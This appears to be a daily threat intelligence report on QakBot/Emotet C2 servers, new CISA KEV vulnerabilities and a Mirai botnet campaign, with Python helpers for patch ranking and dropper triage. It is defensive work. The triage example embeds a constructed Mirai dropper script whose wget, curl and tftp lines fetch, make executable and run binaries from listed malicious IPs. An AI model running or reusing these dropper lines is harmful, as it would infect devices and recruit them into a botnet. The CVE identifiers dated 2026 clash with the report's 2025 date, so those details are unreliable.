Daily Threat Intelligence Report - 2025-07-14
Today's threat landscape is dominated by active QakBot and Emotet command-and-control infrastructure confirmed by Feodotracker: five C2 IPs across US, UK and Japanese hosting infrastructure are actively serving malicious traffic. Concurrently, CISA has added five vulnerabilities to the Known Exploited Vulnerabilities catalogue, including an unauthenticated remote code execution flaw in Palo Alto Networks PAN-OS (CVE-2026-0300) and an authentication bypass in cPanel & WHM (CVE-2026-41940), both of which pose immediate exploitation risk to internet-facing enterprise systems. A sustained Mirai botnet campaign against Linux-based IoT and server infrastructure is evidenced by multiple ELF-format samples and active malware download URLs observed via URLhaus and MalwareBazaar. SOC teams should block all five Feodotracker C2 IPs immediately, apply the CISA KEV patches on an emergency basis, and run KQL hunts for the C2 IPs across MDE and Sentinel environments.
Active QakBot and Emotet C2 Infrastructure: Multi-Region Banking Trojan Campaign
Severity: CRITICAL | Attributed actor: TA505
Feodotracker has confirmed five active command-and-control IP addresses in the last 24 hours: four serving QakBot (50.16.16.211, 34.204.119.63, 178.62.3.223, 27.133.154.218) and one serving Emotet (162.243.103.246), spanning US, UK and Japanese hosting infrastructure. QakBot is a banking trojan and initial-access payload, historically leveraged by TA505 and affiliated ransomware operators to establish a persistent foothold ahead of credential harvesting, lateral movement and ransomware deployment. Emotet, taken down by law enforcement in January 2021 and rebuilt later that year, is a modular loader and spam botnet that has historically delivered secondary payloads including QakBot itself, so concurrent activity from both families compounds the risk. Treat any outbound connection from an enterprise endpoint to these five IPs while they are listed as a high-confidence compromise indicator: isolate the endpoint and open a forensic investigation. A denied connection is not an all-clear, since the implant is present and only its egress failed. Because C2 hosts on rented cloud and VPS infrastructure are recycled quickly, time-box the block entries and re-check the Feodotracker listing status before acting on a match against a stale IOC.
Critical CISA KEV Additions: Unauthenticated RCE in PAN-OS and Authentication Bypass in cPanel/WHM Demand Emergency Patching
Severity: HIGH | Threat actor: Unknown
CISA added five vulnerabilities to the Known Exploited Vulnerabilities catalogue today. Two carry the highest immediate risk: CVE-2026-0300 in Palo Alto Networks PAN-OS, an out-of-bounds write in the User-ID Authentication Portal (Captive Portal) service that allows unauthenticated remote code execution as root on PA-Series and VM-Series firewalls; and CVE-2026-41940 in WebPros cPanel & WHM, an authentication bypass in the login flow that gives unauthenticated remote attackers full control-panel access. The remaining three are CVE-2026-6973 in Ivanti EPMM, remote code execution available to any authenticated administrator-level user; CVE-2026-42208 in BerriAI LiteLLM, SQL injection leading to credential theft from AI proxy infrastructure; and CVE-2026-31431 in the Linux kernel, local privilege escalation via incorrect resource transfer. KEV inclusion means CISA has evidence of in-the-wild exploitation, not merely a published proof of concept. Federal civilian agencies must remediate by the catalogue due date under BOD 22-01; private-sector organizations should treat the two pre-authentication issues on internet-facing systems as emergency changes and the authenticated and local ones as next-cycle priorities. Where immediate patching is not possible, limit exposure of the affected portal and login interfaces to trusted source networks and track the vendors' interim mitigations.
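As an added example (not CISA's code), the following Python joins a KEV-shaped JSON document to an asset inventory and ranks remediation: pre-authentication issues on internet-exposed assets first, authenticated or local issues after. The JSON uses the field names of CISA's known_exploited_vulnerabilities.json feed, but the records (due dates included) and the inventory are constructed placeholders built from the CVE list above, not CISA's published entries; the pre-auth annotations follow the descriptions in this section, and the one the section does not state is treated conservatively.

```python
"""Rank today's KEV additions against an asset inventory.

Added example, not CISA tooling. KEV_SAMPLE mirrors the field names of CISA's
known_exploited_vulnerabilities.json feed (real records also carry vulnerabilityName,
shortDescription, requiredAction and notes), but every record below is a constructed
placeholder assembled from the CVE list in this report, and INVENTORY is invented.
"""
import json

KEV_SAMPLE = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "dateReleased": "2025-07-14T00:00:00.0000Z",
    "count": 5,
    "vulnerabilities": [
        {"cveID": "CVE-2026-0300", "vendorProject": "Palo Alto Networks", "product": "PAN-OS",
         "dateAdded": "2025-07-14", "dueDate": "2025-08-04", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2026-41940", "vendorProject": "WebPros", "product": "cPanel & WHM",
         "dateAdded": "2025-07-14", "dueDate": "2025-08-04", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2026-6973", "vendorProject": "Ivanti", "product": "Endpoint Manager Mobile (EPMM)",
         "dateAdded": "2025-07-14", "dueDate": "2025-08-04", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2026-42208", "vendorProject": "BerriAI", "product": "LiteLLM",
         "dateAdded": "2025-07-14", "dueDate": "2025-08-04", "knownRansomwareCampaignUse": "Unknown"},
        {"cveID": "CVE-2026-31431", "vendorProject": "Linux", "product": "Kernel",
         "dateAdded": "2025-07-14", "dueDate": "2025-08-04", "knownRansomwareCampaignUse": "Unknown"},
    ],
})

# Constructed inventory. The (vendor, product) pair must use KEV's naming for the join.
INVENTORY = [
    {"asset": "fw-edge-01", "vendor": "Palo Alto Networks", "product": "PAN-OS", "internet_exposed": True},
    {"asset": "fw-edge-02", "vendor": "Palo Alto Networks", "product": "PAN-OS", "internet_exposed": True},
    {"asset": "web-host-07", "vendor": "WebPros", "product": "cPanel & WHM", "internet_exposed": True},
    {"asset": "mdm-01", "vendor": "Ivanti", "product": "Endpoint Manager Mobile (EPMM)", "internet_exposed": True},
    {"asset": "build-node-12", "vendor": "Linux", "product": "Kernel", "internet_exposed": False},
    {"asset": "vpn-01", "vendor": "Fortinet", "product": "FortiOS", "internet_exposed": True},
]

# Analyst annotation taken from the report text: does exploitation need prior
# authentication (or local access)? None = not stated; treated as pre-auth to be safe.
PRE_AUTH = {
    "CVE-2026-0300": True,    # unauthenticated RCE on the Captive Portal
    "CVE-2026-41940": True,   # login-flow authentication bypass
    "CVE-2026-6973": False,   # RCE for authenticated administrator users
    "CVE-2026-42208": None,   # SQL injection; auth requirement not stated above
    "CVE-2026-31431": False,  # local privilege escalation
}


def _key(vendor, product):
    """Case/whitespace-insensitive join key."""
    return (vendor.strip().lower(), product.strip().lower())


def priority(exposed, pre_auth):
    """P1: reachable from the internet without credentials. P2: one of the two.
    P3: neither (local or internal-only, needs credentials)."""
    pre_auth = True if pre_auth is None else pre_auth
    if exposed and pre_auth:
        return "P1"
    if exposed or pre_auth:
        return "P2"
    return "P3"


def prioritize(kev_json, inventory):
    """Return ranked actions for KEV entries that hit the inventory, plus the misses."""
    kev = json.loads(kev_json)
    by_product = {}
    for a in inventory:
        by_product.setdefault(_key(a["vendor"], a["product"]), []).append(a)
    actions, unmatched = [], []
    for v in kev["vulnerabilities"]:
        assets = by_product.get(_key(v["vendorProject"], v["product"]), [])
        if not assets:
            unmatched.append(v["cveID"])
            continue
        exposed = any(a["internet_exposed"] for a in assets)
        actions.append({
            "cve": v["cveID"],
            "product": f'{v["vendorProject"]} {v["product"]}',
            "assets": sorted(a["asset"] for a in assets),
            "exposed": exposed,
            "due": v["dueDate"],
            "ransomware_use": v.get("knownRansomwareCampaignUse", "Unknown"),
            "priority": priority(exposed, PRE_AUTH.get(v["cveID"])),
        })
    actions.sort(key=lambda x: (x["priority"], x["cve"]))
    return {"actions": actions, "no_matching_assets": unmatched}


if __name__ == "__main__":
    result = prioritize(KEV_SAMPLE, INVENTORY)
    for a in result["actions"]:
        print(f'{a["priority"]} {a["cve"]:<15} {a["product"]:<40} due {a["due"]} -> {", ".join(a["assets"])}')
    print("no matching assets:", result["no_matching_assets"])
```

A CVE with no matching asset is reported rather than dropped: a miss usually means the inventory names the product differently from KEV, not that the organization is unaffected, so it needs a manual check before it is closed.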
Active Mirai/Gafgyt Botnet Expansion Campaign: Multiple ELF Samples and IoT Exploitation Infrastructure Observed
Severity: MEDIUM | Threat actor: Unknown
MalwareBazaar has confirmed four distinct Mirai-family ELF samples in the last 24 hours, one of them tagged Gafgyt (also known as Bashlite, an older IoT botnet family whose code many Mirai variants borrow from), indicating ongoing recruitment of Linux-based IoT devices, routers and unpatched servers. URLhaus corroborates this with active malware download endpoints hosted on four IP addresses (119.52.128.201, 140.237.38.80, 117.26.82.69 and 42.235.88.133) and served from non-standard high ports, with payloads including bin.sh (a shell-script dropper that typically fetches an architecture-specific binary into a writable directory, marks it executable, runs it and deletes it) and unlabelled binary downloads. Mirai's usual entry point is credential brute-forcing over Telnet and SSH plus known device exploits, and on IoT devices it generally already runs as root; the CVE-2026-31431 Linux kernel privilege escalation added to KEV today is therefore most relevant to partially compromised general-purpose Linux servers, where operators could use it to obtain the privileges a persistent implant needs. That pairing is an assessment, not an observed chain. Separately, maltrail updates to netsupport.txt and fakeapp.txt on GitHub point to parallel delivery of remote access tools through fake-application lures, which may serve as an initial infection vector for endpoints later recruited into the botnet.
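The bin.sh droppers mentioned above follow a recognisable pattern, and the following added Python example (not part of the report and not URLhaus or MalwareBazaar tooling) triages a script for it: it extracts HTTP payload URLs and tftp fetches, maps each to a target CPU architecture from the file name, checks for the writable-directory chain, the fetch/chmod/exec/delete sequence and busybox use, and lists host:port pairs to block. The sample script is constructed; it reuses three of the URLhaus IPs from this section, but the ports, paths and file names are placeholders.

```python
"""Triage a shell script for the Mirai/Gafgyt dropper pattern and extract its IOCs.

Added example for this report. SAMPLE_DROPPER is constructed in the style of the
bin.sh droppers described above: the three IPs are from the URLhaus section, every
port, path and file name is a placeholder.
"""
import re
from urllib.parse import urlparse

SAMPLE_DROPPER = r"""#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://119.52.128.201:40221/bins/mips; chmod +x mips; ./mips router; rm -rf mips
wget http://119.52.128.201:40221/bins/mpsl; chmod +x mpsl; ./mpsl router; rm -rf mpsl
curl -O http://140.237.38.80:2566/bins/arm7; chmod 777 arm7; ./arm7 router; rm -rf arm7
/bin/busybox wget http://140.237.38.80:2566/bins/x86_64 -O x86_64; chmod 777 x86_64; ./x86_64 router
tftp -g -r sh4 117.26.82.69; chmod +x sh4; ./sh4 router
"""

# Constructed benign script for comparison.
BENIGN = "#!/bin/sh\napt-get update && apt-get -y upgrade\n"

# Architecture names commonly used as payload file names by Mirai-style builders.
KNOWN_ARCHES = {"mips", "mpsl", "arm", "arm5", "arm6", "arm7", "x86", "x86_64", "i586",
                "i686", "sh4", "m68k", "ppc", "spc", "arc"}

URL_RE = re.compile(r"""https?://[^\s;'"]+""")
TFTP_RE = re.compile(r"\btftp\s+(?:-g\s+)?-r\s+(\S+)\s+(\d{1,3}(?:\.\d{1,3}){3})")
DIR_CHAIN_RE = re.compile(r"cd\s+/tmp\s*\|\|\s*cd\s+/var/run")
# fetch tool ... chmod (+x or octal) <file>; ./<file>  on a single line
FETCH_EXEC_RE = re.compile(r"\b(wget|curl|tftp)\b[^\n]*?chmod\s+(?:\+x|[0-7]{3,4})\s+\S+\s*;\s*\./")


def _arch(name):
    """Map a payload path or file name to an architecture label."""
    base = name.rsplit("/", 1)[-1].lower()
    return base if base in KNOWN_ARCHES else "unknown"


def extract_payloads(script):
    """Return one record per fetched payload (HTTP URLs and tftp -r fetches)."""
    found = []
    for url in URL_RE.findall(script):
        u = urlparse(url)
        found.append({"url": url, "host": u.hostname,
                      "port": u.port or (443 if u.scheme == "https" else 80),
                      "arch": _arch(u.path)})
    for fname, host in TFTP_RE.findall(script):
        found.append({"url": f"tftp://{host}/{fname}", "host": host, "port": 69,
                      "arch": _arch(fname)})
    return found


def dropper_indicators(script):
    """Boolean indicators of the dropper pattern."""
    archs = {p["arch"] for p in extract_payloads(script)} - {"unknown"}
    return {
        "writable_dir_chain": bool(DIR_CHAIN_RE.search(script)),
        "fetch_chmod_exec": bool(FETCH_EXEC_RE.search(script)),
        "busybox_applet": "busybox" in script,
        "multi_arch_payloads": len(archs) >= 2,
    }


def verdict(script):
    """(label, score): 3+ indicators is the classic multi-arch dropper shape."""
    score = sum(dropper_indicators(script).values())
    label = "mirai_style_dropper" if score >= 3 else "suspicious" if score >= 1 else "benign"
    return label, score


def block_candidates(script):
    """host:port pairs the dropper fetches from, for egress blocking."""
    return sorted({f'{p["host"]}:{p["port"]}' for p in extract_payloads(script)})


if __name__ == "__main__":
    print(verdict(SAMPLE_DROPPER), dropper_indicators(SAMPLE_DROPPER))
    for p in extract_payloads(SAMPLE_DROPPER):
        print(f'{p["arch"]:<8} {p["url"]}')
    print("block:", block_candidates(SAMPLE_DROPPER))
    print(verdict(BENIGN))
```

The architecture list doubles as a hunting lead: a single dropper that fetches five CPU variants is aimed at routers and embedded devices as much as at servers, so the host:port pairs belong on the egress block list for the IoT and OT segments, not only the server VLANs.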